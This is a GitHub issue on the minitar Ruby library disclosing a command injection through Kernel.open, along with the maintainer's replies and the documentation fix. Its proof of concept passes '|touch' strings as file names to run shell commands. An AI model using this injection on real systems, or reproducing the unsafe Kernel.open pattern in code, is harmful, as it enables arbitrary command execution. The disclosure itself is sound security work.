Skip to content

Potential command injection #28

New issue
New issue
Closed
Closed
Potential command injection#28
@ooooooo-q

Description

@ooooooo-q
ooooooo-q
opened on Feb 12, 2018

overview

Archive::Tar::Minitar::Ouput and Archive::Tar::Minitar::Input use Kernel.open,
ruby's Kernel.open has multiple behaviors.
Especially when a character string starting with | is used, it becomes command injection.
(refer: https://sakurity.com/blog/2015/02/28/openuri.html)

PoC

$ irb
irb(main):001:0> require 'minitar'
=> true
irb(main):002:0> Minitar.unpack('|touch xxx', 'x')
Traceback (most recent call last):
        6: from /usr/local/bin/irb:11:in `<main>'
        5: from (irb):2
        4: from /usr/local/lib/ruby/gems/2.5.0/gems/minitar-0.6.1/lib/archive/tar/minitar.rb:247:in `unpack'
        3: from /usr/local/lib/ruby/gems/2.5.0/gems/minitar-0.6.1/lib/archive/tar/minitar/input.rb:21:in `open'
        2: from /usr/local/lib/ruby/gems/2.5.0/gems/minitar-0.6.1/lib/archive/tar/minitar/input.rb:21:in `new'
        1: from /usr/local/lib/ruby/gems/2.5.0/gems/minitar-0.6.1/lib/archive/tar/minitar/input.rb:77:in `initialize'
Archive::Tar::Minitar::NonSeekableStream (Archive::Tar::Minitar::NonSeekableStream)
irb(main):003:0> `ls`
=> "xxx\n"
irb(main):004:0> Minitar.pack('tests', '|touch yyyy')
Traceback (most recent call last):
        8: from /usr/local/bin/irb:11:in `<main>'
        7: from (irb):4
        6: from /usr/local/lib/ruby/gems/2.5.0/gems/minitar-0.6.1/lib/archive/tar/minitar.rb:224:in `pack'
        5: from /usr/local/lib/ruby/gems/2.5.0/gems/minitar-0.6.1/lib/archive/tar/minitar/output.rb:27:in `open'
        4: from /usr/local/lib/ruby/gems/2.5.0/gems/minitar-0.6.1/lib/archive/tar/minitar.rb:236:in `block in pack'
        3: from /usr/local/Cellar/ruby/2.5.0/lib/ruby/2.5.0/find.rb:43:in `find'
        2: from /usr/local/Cellar/ruby/2.5.0/lib/ruby/2.5.0/find.rb:43:in `collect!'
        1: from /usr/local/Cellar/ruby/2.5.0/lib/ruby/2.5.0/find.rb:43:in `block in find'
Errno::ENOENT (No such file or directory - tests)
irb(main):005:0> `ls`
=> "xxx\nyyyy\n"

Activity

halostatue

halostatue commented on Feb 12, 2018

@halostatue
halostatue
on Feb 12, 2018
Owner

The use of Kernel.open is intentional so one could download and open a tarball from a URL, but as you say this could be an injection. I would happily accept a PR to add this warning to the README with a link to the article you suggested. I don’t think that Minitar.{,un}pack accepts an IO, but that would be a way of offloading the security risk to the consumer of the library (Minitar.unpack(open('|touch xxx'))) without actually solving anything.

ooooooo-q
added a commit that references this issue on Feb 17, 2018

update readme (halostatue#28)

429d75e
halostatue
mentioned this on Feb 19, 2018
halostatue

halostatue commented on Feb 19, 2018

@halostatue
halostatue
on Feb 19, 2018
Owner

Fixed in #30 (an expansion of #29).

halostatue
closed this as completedon Feb 19, 2018
halostatue
added a commit that references this issue on Oct 26, 2018

Provide Security Details for Minitar (#30)

a569654
dependabot
mentioned this on Mar 15, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

      Development

      No branches or pull requests

        Participants

        @halostatue@ooooooo-q

        Issue actions
          Potential command injection · Issue #28 · halostatue/minitar